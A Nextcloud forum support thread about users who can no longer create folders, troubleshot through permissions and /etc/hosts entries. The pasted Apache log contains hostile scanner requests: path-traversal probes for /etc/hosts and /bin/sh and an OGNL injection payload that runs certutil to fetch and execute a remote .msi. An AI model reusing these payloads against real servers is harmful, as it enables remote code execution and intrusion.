None of my users can now create folders but they can create files

Support intro

Sorry to hear you’re facing problems :slightly_frowning_face:

help.nextcloud.com is for home/non-enterprise users. If you’re running a business, paid support can be accessed via portal.nextcloud.com where we can ensure your business keeps running smoothly.

In order to help you as quickly as possible, before clicking Create Topic please provide as much of the below as you can. Feel free to use a pastebin service for logs, otherwise either indent short log examples with four spaces:

example

Or for longer, use three backticks above and below the code snippet:

longer
example
here

Some or all of the below information will be requested if it isn’t supplied; for fastest response please provide as much as you can :heart:

Nextcloud version (eg, 20.0.5): 24.0.2
Operating system and version (eg, Ubuntu 20.04): Debian 11.3
Apache or nginx version (eg, Apache 2.4.25): Apache 2.4.53 (Debian)
PHP version (eg, 7.4): 7.4.28

The issue you are facing:

Is this the first time you’ve seen this error? (Y/N): Y

Steps to replicate it:

  1. Connect as any user
  2. Go to files tab
  3. Try to create a new directory

The output of your Nextcloud log in Admin > Logging:

Avertissement	core	Trusted domain error. "X.X.X.X" tried to access using "www.MYDOMAIN.XXX" as host.		2022-07-03T07:33:20+0200
Avertissement	core	Trusted domain error. "X.X.X.X" tried to access using "www.MYDOMAIN.XXX" as host.		2022-07-02T17:22:47+0200
Avertissement	core	Trusted domain error. "X.X.X.X" tried to access using "www.MYDOMAIN.XXX" as host.		2022-07-02T14:31:04+0200

The output of your config.php file in /path/to/nextcloud (make sure you remove any identifiable information!):

<?php
$CONFIG = array (
  'instanceid' => 'MY_INSTANCE_ID',
  'passwordsalt' => 'MY_PASSWORD_SALT',
  'secret' => 'MY_SECRET',
  'trusted_domains' =>
  array (
    0 => 'MYDOMAIN.XXX',
  ),
  'datadirectory' => '/mnt/nextcloud',
  'dbtype' => 'mysql',
  'version' => '24.0.2.1',
  'overwrite.cli.url' => 'https://MYDOMAIN.XXX',
  'dbname' => 'nextcloud',
  'dbhost' => 'localhost',
  'dbport' => '',
  'dbtableprefix' => 'oc_',
  'mysql.utf8mb4' => true,
  'dbuser' => 'nextcloud',
  'dbpassword' => 'PASSWORD',
  'installed' => true,
  'updater.secret' => 'MY_SECRET_KEY',
  'maintenance' => false,
  'theme' => '',
  'loglevel' => 2,
  'mail_smtpmode' => 'smtp',
  'mail_smtpsecure' => 'ssl',
  'mail_sendmailmode' => 'smtp',
  'mail_from_address' => 'nextcloud',
  'mail_domain' => 'MAIL_DOMAIN',
  'mail_smtphost' => 'MAIL_DOMAIN',
  'mail_smtpport' => '587',
  'default_phone_region' => 'FR',
);

The output of your Apache/nginx/system log in /var/log/____:

[Sun Jul 03 00:00:07.057942 2022] [mpm_prefork:notice] [pid 1794] AH00163: Apache/2.4.53 (Debian) OpenSSL/1.1.1n configured -- resuming normal operations
[Sun Jul 03 00:00:07.058162 2022] [core:notice] [pid 1794] AH00094: Command line: '/usr/sbin/apache2'
[Sun Jul 03 00:55:21.267477 2022] [core:error] [pid 85945] [client 185.162.235.162:60726] AH10244: invalid URI path (/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts)
[Sun Jul 03 00:55:25.581155 2022] [php7:error] [pid 85837] [client 185.162.235.162:42128] script '/var/www/html/info.php' not found or unable to stat
[Sun Jul 03 01:50:08.656923 2022] [php7:error] [pid 85836] [client 159.223.196.15:38170] script '/var/www/NON_NEXTCLOUD_DOMAIN.fr.nf/wp-login.php' not found or unable to stat, referer: http://NON_NEXTCLOUD_DOMAIN.fr.nf
[Sun Jul 03 01:50:09.451960 2022] [php7:error] [pid 85835] [client 159.223.196.15:47762] script '/var/www/html/wp-login.php' not found or unable to stat, referer: http://blog.NON_NEXTCLOUD_DOMAIN.fr.nf
[Sun Jul 03 03:41:38.214765 2022] [php7:error] [pid 91257] [client 185.7.214.104:40142] script '/var/www/html/index.php' not found or unable to stat
[Sun Jul 03 05:03:30.592360 2022] [core:error] [pid 85838] (36)File name too long: [client 152.89.198.161:34958] AH00036: access to /${Class.forName("com.opensymphony.webwork.ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("", Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('cmd','/c','cmd /Q /C certutil.exe -urlcache -split -f https:/temp.sh/PxSCi/999.msi 999.msi && 999.msi').start()"))}/ failed (filesystem path '/var/www/html/${Class.forName("com.opensymphony.webwork.ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("", Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('cmd','')
[Sun Jul 03 08:46:20.461287 2022] [core:error] [pid 85835] [client 185.7.214.104:60592] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Sun Jul 03 09:55:18.711227 2022] [php7:error] [pid 112923] [client 103.9.126.114:37462] script '/var/www/html/wp-login.php' not found or unable to stat, referer: http://NON_NEXTCLOUD_DOMAIN.ddns.net
[Sun Jul 03 09:55:23.421692 2022] [php7:error] [pid 112923] [client 103.9.126.114:38388] script '/var/www/html/wp-login.php' not found or unable to stat, referer: http://blog.NON_NEXTCLOUD_DOMAIN.fr.nf

Is the data directory owned by the web server user? And is it reachable via the web server user?

Directories need to be “executable” by the user in order to be traversable.

Does the following command list the data directory contents?

sudo -u www-data ls /mnt/nextcloud

Is the hostname set correctly? Or included in /etc/hosts

1 Like

Is the data directory owned by the web server user? And is it reachable via the web server user?

Yes :

drwxrwx--- 9 www-data    www-data      15 30 oct.   2021 nextcloud

Directories need to be “executable” by the user in order to be traversable.

All directories and subdirectories rights are 755.

Does the following command list the data directory contents?

sudo -u www-data ls /mnt/nextcloud

It works !

Is the hostname set correctly? Or included in /etc/hosts

I think yes. In fact my Nextcloud is not newly installed, it has always worked and I didn’t make any change except upgrading. Tell me what you mean with “set correctly” ?

You can check to be sure…

cat /etc/hosts

Ensure that MYDOMAIN.TLD is included like this:

127.0.0.1    MYDOMAIN.TLD MYDOMAIN localhost

You can check or change the hostname via:

hostnamectl

and then…

hostnamectl set-hostname MYDOMAIN

My /etc/hosts is :

127.0.0.1    localhost

and my hostname is not a FQDN and serve multiple websites.

It has always been working like this, I can do tests if you want but I’m not sure it’s the cause, except if this has changed in new nextcloud versions ?

You should put all hosts for which your server is authoritative or those for which you wish to override DNS.

See the hosts man page for information on /etc/hosts

https://man7.org/linux/man-pages/man5/hosts.5.html

This may or may not fix your error, but should be corrected anyway.

Hum, well done, it’s fixed ! Thanks.

My /etc/hosts now looks like :

127.0.0.1     localhost localhostname FQDN1 FQDN2 FQDN3 FQDN4 FQDN5

Can you confirm that it’s correct ?

Also, I tried to go back to my previous hosts file and after a reboot it still works, I don’t get why… ?

1 Like

The new /etc/hosts looks about right.

Without deeper consideration, I’m unsure about previous hosts file - reboot - still working issue. Hopefully your server works as expected for the foreseeable future with the corrected hosts file.

1 Like

Okay thanks !

Hello, the problem is back today, even if the new /etc/hosts file is still present…

It sounds like it might be an SNI issue of some kind. The hosts file should definitely have all domains entered. However, SNI can be tricky to configure correctly. You may want to use a separate localhost ip address for each domain and then use that ip address instead of ‘localhost’ wherever that appears in your configuration…

For example:

127.1.1.1     Mydomain1
127.1.1.2     Mydomain2
127.1.1.3     Mydomain3

all of those addresses are actually localhost but it might make SNI work more reliably.

If you don’t believe me, you can check it out by pinging each address without adding it to the hosts file first.

ping 127.1.1.2
PING 127.1.1.2 (127.1.1.2) 56(84) bytes of data.
64 bytes from 127.1.1.2: icmp_seq=1 ttl=64 time=0.035 ms

Other then this suggestion, I’m not going to be posting too much today since it’s a holiday where I am…